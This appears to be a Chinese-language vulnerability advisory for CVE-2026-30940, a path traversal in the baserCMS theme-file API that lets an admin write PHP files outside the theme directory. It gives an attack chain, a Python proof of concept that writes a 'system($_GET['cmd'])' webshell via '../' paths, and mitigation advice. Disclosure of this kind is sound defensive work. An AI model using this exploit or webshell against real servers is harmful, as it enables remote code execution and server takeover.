CVE-2026-30940 CVSS 7.2 高危

CVE-2026-30940 baserCMS路径遍历致RCE漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30940

漏洞类型

路径遍历, 远程代码执行, 任意文件写入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

baserCMS

漏洞概述

baserCMS在5.2.3版本之前的主题文件管理API中存在路径遍历漏洞。由于未正确过滤路径参数，经过身份验证的管理员可以利用“../”序列在主题目录之外的任意位置写入PHP文件。攻击者利用此漏洞可执行恶意代码，完全控制服务器。该问题已在5.2.3版本中修复。

技术细节

该漏洞位于`/baser/api/admin/bc-theme-file/theme_files/add.json`接口。系统在处理文件添加请求时，未对用户输入的`path`参数进行严格的目录遍历校验。攻击者需拥有管理员权限，通过构造包含`../`的路径（如`../../webroot/shell.php`），即可绕过目录限制，将恶意PHP文件写入网站根目录或其他可执行目录。一旦文件写入成功，攻击者通过访问该文件即可触发PHP解析器执行系统命令，从而获得服务器权限，造成数据泄露或服务瘫痪。

攻击链分析

STEP 1

步骤1：获取管理员凭证

攻击者通过钓鱼、暴力破解或其他手段获取baserCMS管理员的账号密码或会话令牌。

STEP 2

步骤2：发送恶意请求

攻击者使用管理员权限向`/baser/api/admin/bc-theme-file/theme_files/add.json`接口发送POST请求，在path参数中利用`../`进行目录遍历，并包含恶意PHP代码作为文件内容。

STEP 3

步骤3：写入Webshell

服务器端未正确过滤路径，将恶意PHP文件写入到Web根目录或其他可执行目录下。

STEP 4

步骤4：执行远程代码

攻击者通过浏览器访问已被写入的PHP文件，传入系统命令参数，服务器解析并执行命令，从而实现远程控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/baser/api/admin/bc-theme-file/theme_files/add.json"

# Administrator session cookie (Required)
admin_cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Exploit payload: Write a webshell to the webroot using path traversal
# Adjust the number of "../" based on the directory depth
 exploit_data = {
    "theme": "BcThemeSample", 
    "plugin": "BaserCore",
    "path": "../../../webroot/shell.php", 
    "content": "<?php system($_GET['cmd']); ?>"
}

try:
    response = requests.post(target_url, data=exploit_data, cookies=admin_cookies)
    
    if response.status_code == 200:
        print("[+] File write request sent successfully.")
        print("[+] Check your webshell at: /shell.php?cmd=whoami")
    else:
        print("[-] Request failed. Status code:", response.status_code)
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

baserCMS < 5.2.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用主题文件管理API接口，或通过Web应用防火墙（WAF）添加规则，拦截请求体中包含"../"或"..%2f"序列的数据包。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表